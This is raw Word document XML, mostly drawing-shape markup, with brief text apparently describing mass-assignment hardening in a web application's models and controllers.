                <v:shape id="Shape 1177" o:spid="_x0000_s1027" style="position:absolute;width:5810;height:1428;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dnNxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X+h/CFHopmlWK1tUoVhAKHnyDx3Ez7qObyZKkuv57Uyj0Nh/fcyaz1tTiSs6XlhX0ugkI4szq&#10;knMFh/2y8wHCB2SNtWVScCcPs+nz0wRTbW+8pesu5CKGsE9RQRFCk0rps4IM+q5tiCN3sc5giNDl&#10;Uju8xXBTy36SDKTBkmNDgQ0tCsq+dz9GwX57PL9v1qeqGm3e5q76XC9XLJV6fWnnYxCB2vAv/nN/&#10;6Ti/NxzC7zfxBDl9AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPQJ2c3EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l571500,v2630,,4875,930,6735,2784c580095,4645,581025,6896,581025,9525r,123825c581025,135973,580095,138218,578235,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138218,,135973,,133350l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,58102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3040" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1AF737EA" wp14:editId="1928C09C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4609207</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>152624</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1400175" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26238" name="Group 26238"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1400175" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1400175" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1181" name="Shape 1181"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1400175" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1400175" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1390650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1393280" y="0"/>
                                  <a:pt x="1395525" y="930"/>
                                  <a:pt x="1397385" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1399244" y="4645"/>
                                  <a:pt x="1400174" y="6896"/>
                                  <a:pt x="1400175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1400175" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1400174" y="135979"/>
                                  <a:pt x="1399244" y="138218"/>
                                  <a:pt x="1397385" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1395525" y="141939"/>
                                  <a:pt x="1393280" y="142869"/>
                                  <a:pt x="1390650"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D423E2E" id="Group 26238" o:spid="_x0000_s1026" style="position:absolute;margin-left:362.95pt;margin-top:12pt;width:110.25pt;height:11.25pt;z-index:-251453440" coordsize="14001,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&#10;">
                <v:shape id="Shape 1181" o:spid="_x0000_s1027" style="position:absolute;width:14001;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="14001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PDxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X+h+WKXgR3cSDSHQVKRSLiODaQ70N2TGJZmfT7Brjv+8WhN7m8T5nseptLTpqfeVYQTpOQBDn&#10;zlRcKPg6foxmIHxANlg7JgUP8rBavr4sMDPuzgfqdChEDGGfoYIyhCaT0uclWfRj1xBH7uxaiyHC&#10;tpCmxXsMt7WcJMlUWqw4NpTY0HtJ+VXfrILdiYeH78um0/VOT8Jl/6P1ZqvU4K1fz0EE6sO/+On+&#10;NHF+Okvh75t4glz+AgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJ1ZA8PEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l1390650,v2630,,4875,930,6735,2784c1399244,4645,1400174,6896,1400175,9525r,123825c1400174,135979,1399244,138218,1397385,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138218,,135979,,133350l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1400175,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Model.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Business keys removed from </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$fillable</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> entirely and set once, at creation, by direct attribute assignment which is not subject to mass-assignment protection. If a controller ever regresses to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>update($request-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>all(</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the key still cannot move.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BB727B" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="214" w:line="259" w:lineRule="auto"/>
        <w:ind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Controller.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every write </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>assigns</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$validated</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> only. The four unvalidated controllers gained rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2723D092" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="43" w:line="259"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4064" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B71E7C7" wp14:editId="6BD5A597">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1532632</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-297885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="981075" cy="419100"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26239" name="Group 26239"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="981075" cy="419100"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="981075" cy="419100"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1188" name="Shape 1188"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="342900" y="0"/>
                            <a:ext cx="638175" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="930"/>
                                  <a:pt x="635385" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4645"/>
                                  <a:pt x="638175" y="6896"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="135979"/>
                                  <a:pt x="637245" y="138218"/>
                                  <a:pt x="635385" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="141939"/>
                                  <a:pt x="631280" y="142869"/>
                                  <a:pt x="628650"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194" name="Shape 1194"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="285750"/>
                            <a:ext cx="628650" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="628650" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="619125" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="621755" y="0"/>
                                  <a:pt x="624000" y="924"/>
                                  <a:pt x="625860" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="627720" y="4645"/>
                                  <a:pt x="628650" y="6890"/>
                                  <a:pt x="628650" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="628650" y="126454"/>
                                  <a:pt x="627720" y="128699"/>
                                  <a:pt x="625860" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="624000" y="132420"/>
                                  <a:pt x="621755" y="133350"/>
                                  <a:pt x="619125" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>
                                  <a:pt x="930" y="4645"/>
                                  <a:pt x="2790" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="924"/>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98BEF01" id="Group 26239" o:spid="_x0000_s1026" style="position:absolute;margin-left:120.7pt;margin-top:-23.45pt;width:77.25pt;height:33pt;z-index:-251452416" coordsize="9810,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&#10;BAAEAPMAAADtBwAAAAA=&#10;">
                <v:shape id="Shape 1188" o:spid="_x0000_s1027" style="position:absolute;left:3429;width:6381;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6381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6wwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bb8Iw&#10;DIXvk/YfIk/iNtJyQKgQ0JgG4rJDgR9gJaapaJyqyUr37+fDJG623vN7nze7KXRqpCG1kQ2U8wIU&#10;sY2u5cbA9XJ4X4FKGdlhF5kM/FKC3fb1ZYOViw+uaTznRkkIpwoN+Jz7SutkPQVM89gTi3aLQ8As&#10;69BoN+BDwkOnF0Wx1AFblgaPPX16svfzTzBwSsXeft2O5Oq2XNj9WH/rqzdm9jZ9rEFlmvLT/H99&#10;coJfrgRXvpER9PYPAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAQQvz+sMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l628650,v2630,,4875,930,6735,2784c637245,4645,638175,6896,638175,9525r,123825c638175,135979,637245,138218,635385,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138218,,135979,,133350l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,638175,142875"/>
                </v:shape>
                <v:shape id="Shape 1194" o:spid="_x0000_s1028" style="position:absolute;top:2857;width:6286;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="628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71MwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NS8NA&#10;EL0L/Q/LFLzZTYqIxm5LKQgeRNjWi7chO82mzc6G7Jim/74rCN7m8T5ntZlCp0YaUhvZQLkoQBHX&#10;0bXcGPg6vD08g0qC7LCLTAaulGCznt2tsHLxwpbGvTQqh3Cq0IAX6SutU+0pYFrEnjhzxzgElAyH&#10;RrsBLzk8dHpZFE86YMu5wWNPO0/1ef8TDBw+eGtlefLucyfWHr+70ZalMffzafsKSmiSf/Gf+93l&#10;+eXLI/x+k0/Q6xsAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA+Ce9TMMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l619125,v2630,,4875,924,6735,2784c627720,4645,628650,6890,628650,9525r,114300c628650,126454,627720,128699,625860,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6890,930,4645,2790,2784,4650,924,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,62865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5088" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E3E8C0F" wp14:editId="4090258B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-12135</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="866775" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26240" name="Group 26240"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="866775" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="866775" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1191" name="Shape 1191"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="866775" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="866775" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="857250" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="859880" y="0"/>
                                  <a:pt x="862125" y="924"/>
                                  <a:pt x="863985" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="865845" y="4645"/>
                                  <a:pt x="866775" y="6890"/>
                                  <a:pt x="866775" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="866775" y="126454"/>
                                  <a:pt x="865845" y="128699"/>
                                  <a:pt x="863985" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="862125" y="132420"/>
                                  <a:pt x="859880" y="133350"/>
                                  <a:pt x="857250" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
